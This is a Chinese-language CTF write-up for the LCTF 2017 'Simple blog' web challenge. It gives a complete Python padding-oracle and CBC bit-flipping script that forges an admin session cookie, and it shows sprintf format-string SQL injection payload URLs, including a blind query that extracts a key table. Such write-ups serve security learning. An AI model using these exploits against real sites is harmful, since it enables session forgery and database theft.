更新：

CBC翻转攻击脚本
格式化字符串sql注入详细解答

趁着期中考，复习累了做几道ctf玩玩，只做出来3道web。感谢师傅们出的题！

LCTF 2017-Simple blog-writeup

Task

1 2	A simple blog .To discover the secret of it. http://111.231.111.54/

Solution

源码泄露

1 2	http://111.231.111.54/.login.php.swp http://111.231.111.54/.admin.php.swp

下载下来后，用vim -r恢复，得到源代码：

<?php
error_reporting(0);
session_start();
define("METHOD", "aes-128-cbc");
include('config.php');
function show_page(){
    echo '省略';
}
function get_random_token(){
    $random_token = '';
    $str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890";
    for($i = 0; $i < 16; $i++){
        $random_token .= substr($str, rand(1, 61), 1);
    }
    return $random_token;
}
function get_identity(){
	global $id;
    $token = get_random_token();
    $c = openssl_encrypt($id, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token);
    $_SESSION['id'] = base64_encode($c);
    setcookie("token", base64_encode($token));
    if($id === 'admin'){
    	$_SESSION['isadmin'] = 1;
    }else{
    	$_SESSION['isadmin'] = 0;
    }
}
function test_identity(){
    if (isset($_SESSION['id'])) {
        $c = base64_decode($_SESSION['id']);
        $token = base64_decode($_COOKIE["token"]);
        if($u = openssl_decrypt($c, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token)){
            if ($u === 'admin') {
                $_SESSION['isadmin'] = 1;
                return 1;
            }
        }else{
            die("Error!");
        }
    }
    return 0;
}
if(isset($_POST['username'])&&isset($_POST['password'])){
	$username = mysql_real_escape_string($_POST['username']);
	$password = $_POST['password'];
	$result = mysql_query("select password from users where username='" . $username . "'", $con);
	$row = mysql_fetch_array($result);
	if($row['password'] === md5($password)){
  		get_identity();
  		header('location: ./admin.php');
  	}else{
  		die('Login failed.');
  	}
}else{
	if(test_identity()){
        header('location: ./admin.php');
	}else{
        show_page();
    }
}
?>

admin.php的源码后面放出。

经过测试，存在账号和密码，分别为admin和admin。在login.php页面登陆后会跳转到admin.php。默认情况下，由于并非真实admin，在跳转后会显示you are not admin.

CBC翻转字节攻击

鉴于篇幅的原因，关于CBC翻转字节攻击这里就不多讲了。在观察login.php，以及加上一点点的社工后，可以发现跟NJCTF的某题神似。借网络的脚本，修改了一下，增加登陆页面的验证以及跑出token后的结束标志：

import requests
import base64
url='http://111.231.111.54/login.php'
N=16
def inject_token(token):
    header={"Cookie":"PHPSESSID="+phpsession+";token="+token}
    result=requests.post(url,headers=header)
    return result
def xor(a, b):
    return "".join([chr(ord(a[i])^ord(b[i%len(b)])) for i in xrange(len(a))])
def pad(string,N):
    l=len(string)
    if l!=N:
        return string+chr(N-l)*(N-l)
def padding_oracle(N):
    get=""
    for i in xrange(1,N+1):
        for j in xrange(0,256):
            padding=xor(get,chr(i)*(i-1))
            c=chr(0)*(16-i)+chr(j)+padding
            result=inject_token(base64.b64encode(c))
            if "Error!" not in result.content:
                get=chr(j^i)+get
                break
    return get
def login(url):
    payload = {
        "username":"admin",
        "password":"admin"
    }
    coo1 = {
        "PHPSESSID":"j297k7o6d8stcbvi2c23naj5j6"
    }
    r = requests.post(url,cookies=coo1,data=payload,allow_redirects=False)
    token = r.headers['Set-Cookie'].replace("%3D",'=').replace("%2F",'/').replace("%2B",'+').decode('base64')
    session = "j297k7o6d8stcbvi2c23naj5j6"
    return session, token
while 1:
    phpsession,token = login(url)
    middle1=padding_oracle(N)
    print middle1
    print "\n"
    if(len(middle1)+1==16):
        for i in xrange(0,256):
            middle=chr(i)+middle1
            print "token:"+token
            print "middle:"+middle
            plaintext=xor(middle,token);
            print "plaintext:"+plaintext
            des=pad('admin',N)
            tmp=""
            print des.encode("base64")
            for i in xrange(16):
                tmp+=chr(ord(token[i])^ord(plaintext[i])^ord(des[i]))
            print tmp.encode('base64')
            result=inject_token(base64.b64encode(tmp))
            # print result.content
            if "Login Form" not in result.content and "Error" not in result.content:
                print result.content
                print "success"
                exit()

得到:

1 2	token HGV8cWwzDgk2CBooPRYtXA== PHPSESSID j297k7o6d8stcbvi2c23naj5j6

成功进入后台。

格式化串sql注入

这里放上admin.php的源码：

<?php
error_reporting(0);
session_start();
include('config.php');
if(!$_SESSION['isadmin']){
	die('You are not admin');
}
if(isset($_GET['id'])){
	$id = mysql_real_escape_string($_GET['id']);
	if(isset($_GET['title'])){
		$title = mysql_real_escape_string($_GET['title']);
		$title = sprintf("AND title='%s'", $title);
	}else{
		$title = '';
	}
	$sql = sprintf("SELECT * FROM article WHERE id='%s' $title", $id);
	$result = mysql_query($sql,$con);
	$row = mysql_fetch_array($result);
	if(isset($row['title'])&&isset($row['content'])){
		echo "<h1>".$row['title']."</h1><br>".$row['content'];
		die();
	}else{
		die("This article does not exist.");
	}
}
?>

在看到sprintf后，可以很直接的联系到前阵子爆出的关于wordpress的格式化字符串SQL注入漏洞。传送门：从WordPress SQLi谈PHP格式化字符串问题（2017.11.01更新）

基于泄露出的源码，添加一些变量打印语句，本地测试代码：

<?php
$con = mysql_connect("localhost", "root", "root");
if(isset($_GET['id'])){
	print_r("GET[id] => ".$_GET['id']."</br>");
	$id = mysql_real_escape_string($_GET['id'],$con);
	print_r("\$id => ".$id."</br>");
	if(isset($_GET['title'])){
		print_r("GET[title] => ".$_GET['title']."</br>");
		$title = mysql_real_escape_string($_GET['title']);
		print_r("escape string tile: \$title => ".$title."</br>");
		$title = sprintf("AND title='%s'", $title);
		print_r("After first sprintf : \$title => ".$title."</br>");
	}else{
		$title = '';
	}
	$sql = sprintf("SELECT * FROM article WHERE id='%s' $title", $id);
	print_r("sql => ".$sql);
}
?>

payload:

1	http://127.0.0.1:2500/index.php?id=1&title=flag%1$'%20 or 1=1%23

观察传入的title参数。

title传入的值为flag%1$' or 1=1#，经过mysql_real_escape_string，会使得单引号'前加上斜杠，也就是图片中的第四行：

1	escape string tile: $title => flag%1$\' or 1=1#

接下来执行一次sprintf("AND title='%s'", $title);，也就是将前面得到的title值title值为：

1	After first sprintf : $title => AND title='flag%1$\' or 1=1#'

接下来，又一次执行了sprintf：

1	sprintf("SELECT * FROM article WHERE id='%s' AND title='flag%1$\' or 1=1#'", $id);

由于PHP的sprintf中，%1$\这样的语法，百分号%后面的数表示使用第几个参数，$后面的表示类型，常见的类型比如s表示字符串等等。比如%1$s，表示使用第一个参数，类型为字符串（%s）

<?php
// 注format中，为防止 $ 被转义，在前面加了转义符。对于sprintf来说，即 %1$s
$format1 = "hello,%1\$s one<br/>";
$format2 = "hello,%2\$s two<br/>";
$format3 = "hello,%1\$\' three<br/>";
$format4 = "hello,%\$\' four<br/>";
print_r("format string 1 : ".$format1);
print_r("Result: ".sprintf($format1,"chybeta-1","chybeta-2"));
print_r("format string 2 : ".$format2);
print_r("Result: ".sprintf($format2,"chybeta-1","chybeta-2"));
print_r("format string 3 : ".$format3);
print_r(sprintf($format3,"chybeta-1","chybeta-2"));
print_r("format string 4 : ".$format4);
print_r(sprintf($format4,"chybeta-1","chybeta-2"));
?>

前两个示例是演示选择参数的用法。第三个和前两个比较，变成类型%\，会直接跳过不处理，并直接输出。第四个和第三个对比，少了参数选择，这会导致报错，无法正常打印。

回到前面的sprintf

1	sprintf("SELECT * FROM article WHERE id='%s' AND title='flag%1$\' or 1=1#'", $id);

通过百分号后的1，选择了一个参数（即id）不会爆错。利用类型%\，使得跳过。而原本在\后面的单引号，由于前面斜杠被当作了sprintf的类型，得以成功逃逸。

剩下的工作就是盲注了，比如：

1	http://111.231.111.54/admin.php?id=1&title=flag%1$'%20 or (SELECT%09GROUP_CONCAT(f14g)%09FROM%09web1.key) < 255 #

脚本写得太丑，基于以前的写的框架修改的，这里就不贴啦。

最后注出来的表结构如下：

1
2
3

数据库：web1  
表名:key  
字段名:f14g

flag:

1	LCTF{N0!U_hacked_My_b1og}

回到PHP的sprintf中，sprintf能吃掉\呢？在源码中，采用了case进行分类处理，而对于未知情况，则采取break。明显%\是未知情况，因此成功绕过。

小结

源码泄露
CBC翻转字节攻击
格式化串sql注入